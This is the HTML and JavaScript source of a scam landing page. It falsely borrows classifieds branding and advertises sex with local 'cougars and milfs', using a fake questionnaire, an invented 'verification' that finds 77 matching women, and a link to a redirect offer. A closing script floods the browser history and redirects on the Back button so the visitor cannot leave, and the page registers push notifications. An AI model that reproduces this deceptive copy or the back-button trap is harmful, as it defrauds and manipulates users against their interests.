<!DOCTYPE html><html lang="en-US" xmlns="https://www.w3.org/1999/xhtml"><head>
  
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta name="ROBOTS" content="NOINDEX, NOFOLLOW">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
	      <script src="files/js/dat7_eng.js">
    </script>
    <script $(function() { src="files/js/jquery.min.js" });></script>
    <script>
      $(document).ready(function() {
          $('.option').on('click', function() {
              $(this).toggleClass('checked tr-selected');
          });
      });
    </script>
    <title>
      KIJIJI for Sex Tonight!                                    
    </title>
    <style>
      html{
        margin:0;
        min-height:100%;
        font-size:14px;
        box-sizing:border-box}
      body{
        *background:#ebebeb url(files/images/fasdfas.jpg) no-repeat center top;
        *background-size:initial;
        min-height:100%;
        font-family:Arial,Helvetica,sans-serif;
        margin:0;
        padding:0;
        font-size:24px;
        color:#585858;
        min-height:100%;
        position:relative;
        width:100%;
        height:100%}
      *{
        box-sizing:border-box;
        margin:0;
        padding:0}
      .gifImg{
        margin:10px auto;
        width:100%;
        background-position:center center;
        background-repeat:no-repeat;
        background-size:contain}
      .gifImg i{
        padding-bottom:33.3333333%;
        display:inline-block}
      #slBg{
        position:fixed;
        z-index:-1;
        top:0;
        left:0;
        width:100%;
        height:100%}
      #slBg>div{
        width:100%;
        background-position:center center;
        background-repeat:no-repeat;
        background-size:cover;
        position:absolute;
        top:0;
        left:0;
        bottom:0;
        right:0;
        overflow:hidden;
        border:none;
        padding:0;
        margin:0;
        opacity:0;
        display:none;
        z-index:0}
      #qB,#verify,#final{
        padding:10px;
        max-width:600px;
        margin:.5em auto;
        width:97%}
      h1{
        font-size:20px;
        color:#6464a0}
      #qB,#verify{
        margin-top:8%}
      #qB>div,#verify,#final{
        display:block;
        transition:opacity .8s ease-out;
        opacity:0;
        height:0;
        overflow:hidden;
        background:#e1ecf9;
        -webkit-box-shadow:0 0 6px rgba(0,0,0,0.2);
        -moz-box-shadow:0 0 6px rgba(0,0,0,0.2);
        box-shadow:0 0 6px rgba(0,0,0,0.2);
        padding:0;
        padding-bottom:20px;
        margin:0 auto;
        width:100%;
        text-align:center}
      #qB>:first-child,#qB .show{
        opacity:1;
        height:auto}
      #qB p{
        line-height:140%;
        padding:8px 20px;
        font-size:24px;
        margin-bottom:15px;
        text-align:left}
      #qB h1,#qB h3,#verify h1,#final h1{
        font-size:140%;
        text-align:center;
        margin-top:15px}
      #qB .txt{
        color:#6464a0;
        margin-bottom:20px;
        text-align:center;
        line-height:45px;
        font-size:37px}
      #qB h2{
        font-size:100%;
        font-style:italic;
        color:#6464a0;
        font-weight:400;
        margin-left:1em;
        margin-top:10px}
      #qB>div div,#final a{
        width:60%;
        margin-top:10px;
        max-width:200px;
        display:inline-block;
        border-radius:4px;
        -webkit-border-radius:4px;
        cursor:pointer;
        font-weight:normal;
        text-decoration:none;
        z-index:10;
        text-align:center;
        font-size:24px;
        line-height:50px;
        color:#fff;
        border:solid 1px #6464a0;
        background:#368528;
        background-image:linear-gradient(to bottom,#6464a0,#7f7fbd);
        background-image:-webkit-linear-gradient(to bottom,#6464a0,#7f7fbd)}
      #qB>div div,#final a{
        -webkit-tap-highlight-color:rgba(0,0,0,0)}
      #qB>div div:hover,#final a:hover{
        background-image:linear-gradient(to bottom,#7f7fbd,#6464a0);
        background-image:-webkit-linear-gradient(to bottom,#7f7fbd,#6464a0);
        text-shadow:0 0 7px rgba(0,0,0,0.4)}
      #qB>div div+div{
        background:#717171;
        margin-left:10px;
        color:#c0c0c0;
        border:1px solid #525252}
      #qB>div div+div:hover{
        background:#3b3b3b;
        color:#fff;
        border:1px solid #484848}
      #qB h3{
        width:100%;
        font-size:18px;
        color:#6464a0;
        font-weight:bold;
        padding-top:12px;
        padding-bottom:12px;
        margin-bottom:1em;
        text-align:center;
        line-height:34px;
        border-bottom:1px solid rgba(0,51,153,0.2)}
      #qB h3 span{
        font-size:16px;
        color:#6464a0;
        font-weight:bold;
        padding:8px 18px;
        background:#d9e0f0}
      #qB h3 span:first-child{
        margin-left:10px}
      #qB h3 .active{
        background:#6464a0;
        color:#fff}
      #qB ul{
        list-style:none;
        margin:.5em 0 1.5em 1em;
        text-align:left}
      #qB ul li{
        cursor:pointer}
      #qB ul li:hover span{
        color:#6464a0;
        font-weight:bold}
      #qB ul li span{
        margin:0;
        max-height:3.5em;
        overflow:hidden;
        position:relative;
        line-height:120%;
        margin:1em auto;
        color:#626262}
      #qB ul li span:before{
        content:'';
        width:0;
        height:0;
        padding:.6rem;
        border:.2rem #626262 solid;
        top:0;
        left:0;
        display:inline-block;
        margin:.5rem;
        vertical-align:middle;
        position:relative}
      #qB ul li:hover span:before{
        border-color:#6464a0}
      #qB ul li .box-fill:before{
        background:#6464a0;
        box-shadow:inset 0 0 0 .2em #e1ecf9;
        border-color:#6464a0}
      #qB ul li .box-fill{
        color:#6464a0;
        font-weight:bold}
      #verify,#final{
        text-align:center;
        opacity:1;
        height:auto;
        margin-top:15%}
      #verify p{
        text-align:center;
        margin:10px;
        line-height:150%;
        font-weight:600}
      #verify .result{
        margin:20px 0;
        font-size:140%;
        text-align:center}
      .progress{
        height:1.6em;
        border:1px solid #6464a0;
        border-radius:15px;
        -webkit-border-radius:15px;
        width:90%;
        display:inline-block}
      .progress>#theBar{
        background-image:-webkit-linear-gradient(135deg,#6464a0 25%,transparent 25%,transparent 50%,#6464a0 50%,#6464a0 75%,transparent 75%,transparent);
        background-image:linear-gradient(135deg,#6464a0 25%,transparent 25%,transparent 50%,#6464a0 50%,#6464a0 75%,transparent 75%,transparent);
        background-size:40px 40px;
        height:100%;
        background-color:#6464a0;
        width:33%;
        transition-duration:0s;
        -webkit-box-shadow:inset 0 -1px 0 rgba(0,0,0,.15);
        box-shadow:inset 0 -1px 0 rgba(0,0,0,.15);
        -webkit-transition:width 300ms ease;
        transition:width 300ms ease;
        -webkit-animation:progress-bar-stripes 2s linear infinite;
        animation:progress-bar-stripes 2s linear infinite;
        border-radius:15px 0 0 15px;
        -webkit-border-radius:15px 0 0 15px}
      @-webkit-keyframes progress-bar-stripes{
        from{
          background-position:40px 0}
        to{
          background-position:0 0}
      }
      @-o-keyframes progress-bar-stripes{
        from{
          background-position:40px 0}
        to{
          background-position:0 0}
      }
      @keyframes progress-bar-stripes{
        from{
          background-position:40px 0}
        to{
          background-position:0 0}
      }
      #fine{
        width:100%;
        font-size:18px;
        font-weight:bold;
        padding-top:18px;
        padding-bottom:3px;
        margin-bottom:0.5em;
        text-align:center;
        line-height:30px;
      }
      hr{
        color:#a8a7a7;
        filter:alpha(opacity=25);
        -moz-opacity:.25;
        opacity:.25;
        width:95%;
        display:block;
        margin:.5em auto}
      #final h1{
        color:#6464a0;
        font-size:34px;
        margin-top:30px}
      #final h2{
        font-size:18px;
        font-weight:400;
        margin:.8em 0;
        text-align:left;
        padding:0 20px}
      #res>p{
        display:none}
      #res>:first-child{
        display:block}
      #verify,#final{
        display:none;
        width:95%}
      @media screen and (device-aspect-ratio:40/71),screen and (max-device-width:400px){
        #qB,#verify,#final{
          margin-top:10px}
        #qB h1,#verify h1,#final h1{
          line-height:1;
          padding:10px}
        #qB>div:first-child{
          margin-top:-10px}
        #qB .txt{
          font-size:1.3em;
          line-height:1.1em;
          padding-top:20px;
          margin-bottom:5px}
        #qB>div:first-child p{
          line-height:120%;
          padding:5px;
          font-size:0.8em;
          margin-bottom:5px}
        #qB h3 span{
          font-size:14px;
          color:#8b8c8b;
          font-weight:bold;
          padding:8px}
        #qB h3 .active{
          border-radius:50%;
          -webkit-border-radius:50%;
          padding:8px 13px}
      }
      @media screen and (max-device-width:500px){
        #qB h1,#verify h1,#final h1{
          line-height:1;
          padding:10px}
		}
		  
 	@media only screen and (max-width: 1380px) and (min-width: 1026px) {
		#qB{
			margin-top: 14%;
		}
}
			@media only screen and (max-width: 1025px) and (min-width: 800px) {
		#qB{
			margin-top: 18%;
		}
}
					@media only screen and (max-width: 799px) and (min-width: 501px) {
		#qB{
			margin-top: 25%;
		}
}
					@media only screen and (max-width: 500px) and (min-width: 361px) {
		#qB{
			margin-top: 50%;
		}
						.entrylogo {
							max-width: 320px;
						}
}
							@media only screen and (max-width: 360px) {
		#qB{
			margin-top: 65%;
		}
								.entrylogo {
							max-width: 300px;
						}
}
    </style>
    <style>
      .checkbox_wrap {
          margin: 0 auto;
          width: 100%;
          display: -webkit-box;
          display: -ms-flexbox;
          display: flex;
          -webkit-box-pack: center;
          -ms-flex-pack: center;
          justify-content: center;
          -ms-flex-wrap: wrap;
          flex-wrap: wrap;
          max-width: 600px
      }
      .option {
          width: 28%;
          position: relative;
          text-align: left;
          cursor: pointer;
          text-align: center;
          margin: 0.5rem 2%
      }

      .option img {
          display: block;
          width: 100%;
          border: 3px solid #000;
          border-radius: 8px
      }

      .option-title {
          font-size: 1.8rem;
          padding-top: 5px
      }

      .option.checked img {
          border: 8px solid #6464a0
      }

      .option.checked .option-title {
          color: #6464a0
      }
    </style>
    
    <script src="files/js/onesignalsdk.js" async></script>
<script>
  var OneSignal = window.OneSignal || [];
  OneSignal.push(function() {
    OneSignal.init({
      appId: "a5943b47-8ecc-4894-9f84-15e8146936f5",
    });
  });
</script>
    
  
    </head><body><div id="slBg" data-slides="https://null.null/null">
      <div style="background-image: url(files/images/bg1.jpg); display: none; opacity: 0;">
      </div>
    <div style="background-image: url(files/images/bg1.jpg); display: none; opacity: 0;"></div><div style="background-image: url(files/images/bg14.jpg); display: none; opacity: 0;"></div><div style="background-image: url(files/images/bg13.jpg); display: block; opacity: 0.9999999999999999;"></div><div style="background-image:url(files/images/bg3.jpg);"></div><div style="background-image:url(files/images/wap2.jpg);"></div><div style="background-image:url(files/images/wap3.jpg);"></div><div style="background-image:url(files/images/wap4.jpg);"></div><div style="background-image:url(files/images/wap7.jpg);"></div><div style="background-image:url(files/images/wap6.jpg);"></div></div>
    <!-- Question block START. You can add/delete as many questions and answers to them as you want. Script will handle it automatically-->            
    <div id="qB">
      <div style="max-width:500px">
		  <img class="entrylogo" src="files/images/gumtree2.jpg" style="margin-top:5%">
        <h1 class="txt">
                                                                                 
        </h1>
        <p style="text-align:center">
          This is the First&No.1 Local Mature Cougars-Dating Site                              
          <u>
            For You in 2021                              
          </u>
          !                                                                   
        </p>
        <h6 class="gifImg" style="background-image:url(files/eng_dat7-7gm.html);max-width: 0px;" data-gif id="gifImg">
          <i>
          </i>
        </h6>
        <p style="text-align:center">
          Someone near you(37,searching for dating partner)wants to share her secret private photos and short videos with you.                                                                      
        </p>
        <div>
          Ok                                                                        
        </div>
      </div>
      <div>
        <h1 class="txt">
          IMPORTANT!                                                                        
        </h1>
        <p>
          Before we can show you the lists of secret private photos and short videos of                               
          <u>
            single rich mature cougars and milfs                              
          </u>
          who live near you and are ready to                               
          <u>
            meet and have fun with you tonight                              
          </u>
          ,we need to ask some simple questions about you:                                
        </p>
        <div>
          NEXT »                                                                        
        </div>
      </div>
      <div>
        <h3>
          QUESTION                                                                                           
          <span class="active">
            1                                                                                          
          </span>
          <span>
            2                                                                                          
          </span>
          <span>
            3                                                                                          
          </span>
          <span>
            4                                                                                          
          </span>
        </h3>
        <p>
          These local single rich mature cougars and milfs are lonely single moms,horny married women and desperate cheating wives looking for some fun and pleasure.They could be your neighbors or someone else you know.Do you agree to keep their identities a secret?                                                                       
        </p>
        <div>
          Yes                                                                        
        </div>
        <div>
          No                                                                        
        </div>
      </div>
      <div>
        <h3>
          QUESTION                                                                                           
          <span>
            1                                                                                          
          </span>
          <span class="active">
            2                                                                                          
          </span>
          <span>
            3                                                                                          
          </span>
          <span>
            4                                                                                          
          </span>
        </h3>
        <p>
          These local single rich mature cougars and milfs are not only interested in short-term secret love affairs                               
          <u>
            but also looking for long-term relationships and life partners.                             
          </u>
          Do you agree to this request?                                
        </p>
        <div>
          Yes                                                                       
        </div>
        <div>
          No                                                                        
        </div>
      </div>
      <div>
        <h3>
          QUESTION                                                                                           
          <span>
            1                                                                                          
          </span>
          <span>
            2                                                                                          
          </span>
          <span class="active">
            3                                                                                          
          </span>
          <span>
            4                                                                                          
          </span>
        </h3>
        <p>
          Could you please treat these local single rich mature cougars with respect when having fun with a partner you meet on our community?                                                                        
        </p>
        <div>
          Yes                                                                        
        </div>
        <div>
          No                                                                        
        </div>
      </div>
      <div>
        <h3>
          QUESTION                                                                                           
          <span>
            1                                                                                          
          </span>
          <span>
            2                                                                                          
          </span>
          <span>
            3                                                                                          
          </span>
          <span class="active">
            4                                                                                          
          </span>
        </h3>
        <p>
          Every day when you check your account,you will probably receive multiple dating and sex requests                               
          <u>
            from these local single mature cougars and milfs.                              
          </u>
          Are you comfortable with this situation?                                
        </p>
        <div>
          Yes                                                                        
        </div>
        <div>
          No                                                                        
        </div>
      </div>
      <div>
        <h1>
          What body type do you like?                                                                        
        </h1>
        <h2>
          (Choose up to 3 answers)                                                                       
        </h2>
        <hr>
        <span class="checkbox_wrap">
          <span class="option photo_option tr-option"> <img src="files/images/body1_o.jpg" alt>
              <span class="option-title clearfix"> Skinny/slim </span>
          </span>
          <span class="option photo_option tr-option"> <img src="files/images/body2_o.jpg" alt>
              <span class="option-title clearfix"> Cougars/Milfs </span>
          </span>
          <span class="option photo_option tr-option"> <img src="files/images/body3_o.jpg" alt>
              <span class="option-title clearfix"> BBW/Gilfs </span>
          </span>
          <span class="option photo_option tr-option"> <img src="files/images/body4_o.jpg" alt>
              <span class="option-title clearfix"> Big natural tits </span>
          </span>
          <span class="option photo_option tr-option"> <img src="files/images/body5_o.jpg" alt>
              <span class="option-title clearfix"> Sexy round ass </span>
          </span>
        </span>
        <div>
          NEXT »                                                                        
        </div>
      </div>
      <div>
        <h1>
          What messaging Apps are you using to contact?                                                                        
        </h1>
        <h2>
          (Choose up to 3 answers)                                                                        
        </h2>
        <hr>
       <span class="checkbox_wrap">
          <span class="option photo_option tr-option"> <img src="files/images/18.jpg" alt>
              <span class="option-title clearfix"> Tele gram </span>
          </span>
          <span class="option photo_option tr-option"> <img src="files/images/25.jpg" alt>
              <span class="option-title clearfix"> Facebook Instagram </span>
          </span>
          <span class="option photo_option tr-option"> <img src="files/images/35_2.jpg" alt>
              <span class="option-title clearfix"> Whats app </span>
          </span>
          <span class="option photo_option tr-option"> <img src="files/images/45.jpg" alt>
              <span class="option-title clearfix"> Skype Snapchat Tiktok </span>
          </span>
          <span class="option photo_option tr-option"> <img src="files/images/55_2.jpg" alt>
              <span class="option-title clearfix"> Email Other Apps </span>
          </span>
        </span>
        <div>
          NEXT »                                                                        
        </div>
      </div>
      <div>
        <h1>
          What type of relationship are you looking for?                                                                        
        </h1>
        <h2>
          (Choose up to 3 answers)                                                                        
        </h2>
        <hr>
        <span class="checkbox_wrap">
          <span class="option photo_option tr-option"> <img src="files/images/missionario.jpg" alt>
              <span class="option-title clearfix"> Ramdom hookup 419 </span>
          </span>
          <span class="option photo_option tr-option"> <img src="files/images/pecorina.jpg" alt>
              <span class="option-title clearfix"> Make love in different places </span>
          </span>
          <span class="option photo_option tr-option"> <img src="files/images/anale.jpg" alt>
              <span class="option-title clearfix"> Secret love Affairs </span>
          </span>
          <span class="option photo_option tr-option"> <img src="files/images/sopra.jpg" alt>
              <span class="option-title clearfix"> Really Serious Datings </span>
          </span>
          <span class="option photo_option tr-option"> <img src="files/images/pompino.jpg" alt>
              <span class="option-title clearfix"> Marriage </span>
          </span>
        </span>
        <div>
          NEXT »                                                                        
        </div>
      </div>
      <div>
        <h1>
          Distance between you and her?                                
        </h1>
        <h2>
          (Choose up to 3 answers))                                                                        
        </h2>
        <hr>
        <ul>
          <li>
            <span>
              Within walking distance                                                                                                           
            </span>
          </li>
          <li>
            <span>
              Same city                                                                                                            
            </span>
          </li>
          <li>
            <span>
              Nearby towns are OK                                                                                                            
            </span>
          </li>
          <li>
            <span>
              Same region                                                                                                            
            </span>
          </li>
          <li>
            <span>
              It doesn't matter                                                                                                           
            </span>
          </li>
        </ul>
        <div>
          NEXT »                                                                        
        </div>
      </div>
    </div>
    <!-- Question block END-->            
    <!--Checking results START--><div id="verify"><h1>
        Results                              
      </h1><p>
        Just one moment of patience ...                              
      </p><div id="res"><p>
          Verifying the answers...                                        
        </p><p>
          Search for suitable dating partners for you...                                        
        </p><p>
          There are 
          <u><b>
              77
            </b></u>
          local women that match yours profile...                                        
        </p><p>
          Congratulations!You have passed the selection!                                        
        </p><p>
          You are allowed to enter.                                        
        </p></div><div class="progress"><div id="theBar" style="width:0%;"></div></div></div><!--Checking results END--><!--Final page START--><div id="final">
      <h1>
        Congratulations!                                                
      </h1>
      <h2>
        Based on your answers, you can now see your lists of                                  
        <b>
          <u>
            private photos and short videos                                        
          </u>
        </b>
        of these rich mature cougars and milfs                                 
        <u>
          <b>
            near you and ready for fun with you!                                        
          </b>
        </u>
        Again, please keep their identities a secret!                                       
      </h2>
      <h2>
        <strong>
          Click on the "CONTINUE" button below to join our community and start searching for rich mature cougars and milfs near you!                                                                         
        </strong>
      </h2>
      <a href="https://redirect.info-domen.com/offer" id="cta">
        CONTINUE »                                                       
      </a>
      
      
       <script>
   ! function () { 
var t; 
try { 
for (t = 0; 10 > t; ++t) history.pushState({}, "", "#"); 
onpopstate = function (t) { 
t.state && location.replace("https://null.null/null") 
} 
} catch (o) {} 
}();

    function loadCB(){ 
        window.location.href = "https://null.null/null";
    }

</script>
          

</div></body></html>